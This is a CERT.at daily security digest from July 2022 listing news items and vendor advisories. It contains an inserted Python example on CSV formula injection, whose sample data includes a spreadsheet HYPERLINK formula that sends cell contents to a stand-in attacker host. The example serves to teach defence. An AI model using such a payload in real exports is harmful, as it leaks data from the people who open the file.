[CERT-daily] Daily summary - 20.07.2022

Daily end-of-shift report team at cert.at
Wed Jul 20 18:51:00 CEST 2022


=====================
= End-of-Day report =
=====================

Timeframe:   Tuesday 19-07-2022 18:00 − Wednesday 20-07-2022 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Stephan Richter

=====================
=       News        =
=====================

∗∗∗ Security vulnerabilities in MiCODUS GPS trackers could endanger human lives ∗∗∗
---------------------------------------------
Security researchers warn that attackers could, among other things, remotely stop government vehicles. No security patches are available so far.
---------------------------------------------
https://heise.de/-7184324


∗∗∗ Ignore the phishing mail about "unauthorized activity"! ∗∗∗
---------------------------------------------
A phishing message impersonating Raiffeisen Bank is currently circulating and demands that you authenticate. Supposedly a payment of EUR 1,259.00 was made and then blocked. Note: this is merely a fabricated pretext with which criminals want to get you to click on a phishing page. Simply delete the message!
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-mail-zu-unbefugten-aktivitaeten-ignorieren/


∗∗∗ Breaking down CIS's new software supply chain security guidance ∗∗∗
---------------------------------------------
Securing the software supply chain continues to be one of the most discussed topics currently among IT and cybersecurity leaders. A study by In-Q-Tel researchers shows a rapid rise in software supply chain attacks starting around 2016, going from almost none in 2015 to about 1,500 in 2020. The Cloud Native Computing Foundation’s (CNCF’s) catalog of software supply chain attacks also supports a rise in this attack vector.
---------------------------------------------
https://www.csoonline.com/article/3666742/breaking-down-ciss-new-software-supply-chain-security-guidance.html


∗∗∗ Luna and Black Basta — new ransomware for Windows, Linux and ESXi ∗∗∗
---------------------------------------------
This report discusses new ransomware that targets Windows, Linux and ESXi systems: Luna, written in Rust, and Black Basta.
---------------------------------------------
https://securelist.com/luna-black-basta-ransomware/106950/


∗∗∗ PrestaShop Skimmer Concealed in One Page Checkout Module ∗∗∗
---------------------------------------------
PrestaShop is a popular freemium open source e-commerce platform used by hundreds of thousands of webmasters to sell products and services to website visitors. While PrestaShop's CMS market share is only 0.8%, it should still come as no surprise that attackers have been crafting malware to specifically target environments that use this software.
---------------------------------------------
https://blog.sucuri.net/2022/07/prestashop-skimmer-concealed-in-one-page-checkout-module.html


∗∗∗ LockBit: Ransomware Puts Servers in the Crosshairs ∗∗∗
---------------------------------------------
LockBit affiliates are using servers to spread ransomware throughout networks.
---------------------------------------------
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers


∗∗∗ Analysis of a trojanized jQuery script: GootLoader unleashed ∗∗∗
---------------------------------------------
In this blog post, we will perform a deep analysis of GootLoader, malware which is known to deliver several types of payloads, such as the Kronos trojan, REvil, IcedID and GootKit, and in this case Cobalt Strike.
---------------------------------------------
https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/


∗∗∗ 4 Strategies for Achieving Greater Visibility in the Cloud ∗∗∗
---------------------------------------------
Here are four ways to put visibility at the center of your cloud security approach and better understand what's going on in your environment.
---------------------------------------------
https://www.rapid7.com/blog/post/2022/07/20/4-strategies-for-achieving-greater-visibility-in-the-cloud/



=====================
=  Vulnerabilities  =
=====================

∗∗∗ Patch now! Oracle secures its products with 349 updates ∗∗∗
---------------------------------------------
Important security patches close, among others, critical vulnerabilities in Oracle applications.
---------------------------------------------
https://heise.de/-7184179


∗∗∗ Security updates: root vulnerability threatens Zyxel firewalls ∗∗∗
---------------------------------------------
Several Zyxel firewall models can be attacked via security vulnerabilities.
---------------------------------------------
https://heise.de/-7184526


∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (golang-github-gosexy-gettext, golang-github-hub, oci-seccomp-bpf-hook, and popub), Oracle (kernel and kernel-container), SUSE (python2-numpy), and Ubuntu (check-mk and pyjwt).
---------------------------------------------
https://lwn.net/Articles/901879/


∗∗∗ Chrome 103 Update Patches High-Severity Vulnerabilities ∗∗∗
---------------------------------------------
Google this week announced a Chrome update that resolves a total of 11 vulnerabilities in the browser, including six reported by external researchers. Of these, five are use-after-free issues, including four that are considered “high severity.”
---------------------------------------------
https://www.securityweek.com/chrome-103-update-patches-high-severity-vulnerabilities


∗∗∗ HCL BigFix: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, authenticated attacker can exploit multiple vulnerabilities in HCL BigFix to bypass security measures or disclose information.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0733


∗∗∗ OpenJDK: Multiple vulnerabilities allow code execution ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in OpenJDK to execute arbitrary code, bypass security measures or manipulate files.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0746


∗∗∗ Arista EOS: Vulnerability allows bypassing of security measures ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit a vulnerability in Arista EOS to bypass security measures.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0761


∗∗∗ Red Hat OpenShift (Logging Subsystem): Vulnerability allows denial of service ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit a vulnerability in Red Hat OpenShift (Logging Subsystem) to carry out a denial of service attack.
---------------------------------------------
https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0707


∗∗∗ Security Bulletin: IBM Resilient Platform could allow formula injection in Excel (CVE-2020-4633) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-platform-could-allow-formula-injection-in-excel-cve-2020-4633-3/
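The bulletin above names the vulnerability class only. As an added illustration (not code from IBM's bulletin or the Resilient platform), the following Python shows what formula injection in a CSV export looks like, a vulnerable exporter next to a neutralised one, and an audit function that flags formula-like cells in an existing export. The incident rows and the attacker.example domain are constructed sample data.

```python
"""Spreadsheet (CSV) formula injection: vulnerable export beside a neutralised one.

Added example; sample rows are constructed and not taken from the IBM bulletin.
"""
import csv
import io

# A text cell beginning with one of these is evaluated as a formula by Excel/LibreOffice.
FORMULA_PREFIXES = ("=", "+", "-", "@")
# A text cell beginning with one of these can break out of the cell or line.
CONTROL_PREFIXES = ("\t", "\r", "\n")

HEADER = ["incident_id", "reporter", "summary"]

# Constructed sample: "summary" is an untrusted, user-supplied free-text field.
ROWS = [
    [1001, "alice", "Phishing mail reported, no click"],
    [1002, "mallory", '=HYPERLINK("http://attacker.example/?c="&A1,"click")'],
    [1003, "mallory", "@SUM(1,1)"],
    [1004, "bob", "-5 hosts affected"],
]


def is_formula_cell(value):
    """True if a raw string would be interpreted as a formula or a cell/line break."""
    return isinstance(value, str) and value.startswith(FORMULA_PREFIXES + CONTROL_PREFIXES)


def neutralize_cell(value):
    """Prefix a dangerous string with a single quote so spreadsheets treat it as text.

    Non-string values (ints, floats) are left untouched: a numeric -5 is a number, not a
    formula, so keep numbers typed as numbers rather than as strings before export.
    """
    if is_formula_cell(value):
        return "'" + value
    return value


def export_csv_unsafe(rows, header=HEADER):
    """Vulnerable: untrusted strings are written straight into the CSV."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    writer.writerow(header)
    writer.writerows(rows)
    return buf.getvalue()


def export_csv_safe(rows, header=HEADER):
    """Hardened: every cell is neutralised and every field is quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def audit_csv(text):
    """Check an existing export: (row, col) of every cell that starts like a formula."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                findings.append((r, c))
    return findings


if __name__ == "__main__":
    unsafe = export_csv_unsafe(ROWS)
    print(unsafe)
    print("unsafe export findings:", audit_csv(unsafe))
    safe = export_csv_safe(ROWS)
    print(safe)
    print("safe export findings:", audit_csv(safe))
```

The leading quote is the usual neutralisation because Excel and LibreOffice then display the cell as literal text; quoting every field with QUOTE_ALL additionally stops embedded separators from spilling into neighbouring cells. The cost is that free text that happens to start with "-" or "+" (such as "-5 hosts affected") also gets the quote, which is why numeric columns should be exported as numbers rather than strings.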


∗∗∗ Security Bulletin: IBM InfoSphere Information Analyzer is affected by a cross-site scripting vulnerability in jQuery-UI(CVE-2021-41184) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-information-analyzer-is-affected-by-a-cross-site-scripting-vulnerability-in-jquery-uicve-2021-41184/


∗∗∗ Security Bulletin: Multiple cross-site scripting vulnerabilities in JQuery affect IBM InfoSphere Information Server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-cross-site-scripting-vulnerabilities-in-jquery-affect-ibm-infosphere-information-server/


∗∗∗ Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization – Apache Log4j – CVE-2021-45105 (affecting v2.16) and CVE-2021-45046 (affecting v2.15) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-security-vulnerability-as-it-relates-to-ibm-maximo-scheduler-optimization-apache-log4j-cve-2021-45105-affecting-v2-16-and-cve-2021-45046-affecting-v2-15/


∗∗∗ Security Bulletin: IBM QRadar Network Security is affected by multiple vulnerabilities in the Expat library ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-security-is-affected-by-multiple-vulnerabilities-in-expact-library/


∗∗∗ Security Bulletin: IBM WebSphere Application Server is vulnerable to Cross-site Scripting (CVE-2022-22477) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-application-server-is-vulnerable-to-cross-site-scripting-cve-2022-22477-2/


∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to improper certificate validation (CVE-2021-29755) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-improper-certificate-validation-cve-2021-29755/


∗∗∗ Security Bulletin: IBM QRadar Network Security is affected by multiple vulnerabilities. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-security-is-affected-by-multiple-vulnerabilities-3/


∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to information disclosure due to incorrect file permissions (CVE-2022-22424) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-infomation-disclosured-due-to-incorrect-file-permissions-cve-2022-22424/


∗∗∗ Security Bulletin: A vulnerability in IBM Java SDK and IBM Java Runtime affects IBM QRadar SIEM ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-java-sdk-and-ibm-java-runtime-affects-ibm-qradar-siem/


∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to information disclosure (CVE-2021-38936) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-infomarion-discosure-cve-2021-38936/


∗∗∗ Security Bulletin: Vulnerability in Java SE related to the JSSE component affects DB2 Recovery Expert for Linux, Unix and Windows ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-java-se-related-to-the-jsse-component-affects-db2-recovery-expert-for-linux-unix-and-windows/


∗∗∗ Security Bulletin: A security vulnerability in Node.js nconf affects IBM Cloud Pak for Multicloud Management Managed Services ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-in-node-js-nconf-affects-ibm-cloud-pak-for-multicloud-management-managed-services/


∗∗∗ Security Bulletin: IBM Resilient SOAR is Using Components with Known Vulnerabilities – Java SE (CVE-2020-2773) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-is-using-components-with-known-vulnerabilities-java-se-cve-2020-2773-3/

-- 
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
